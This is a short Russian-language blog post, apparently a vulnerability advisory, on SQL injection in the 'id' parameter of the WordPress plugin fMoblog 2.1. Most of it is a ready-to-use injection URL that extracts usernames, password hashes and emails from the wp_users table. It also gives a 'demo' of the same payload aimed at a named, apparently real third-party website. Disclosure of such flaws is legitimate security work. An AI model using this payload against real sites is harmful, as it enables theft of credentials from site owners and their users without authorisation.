Уязвимость WordPress плагина fMoblog 2.1

Найдена уязвимость в WordPress плагине fMoblog, которая позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных WordPress.

Уязвимость существует из-за недостаточной обработки входных данных в параметре «id».

Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

# Exploit:

http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,gr

oup_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--

# Demo:

http://www.tarynitup.com/?page_id=20&id=-999+union+all+select+1,2,3,4,group

_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--

Если вам понравился пост, вы можете оставить комментарий или подписаться на RSS и получать каждый новый пост из этого блога.

Комментарии

Еще никто не комментировал.

Оставьте комментарий

(обязательно)

(обязательно)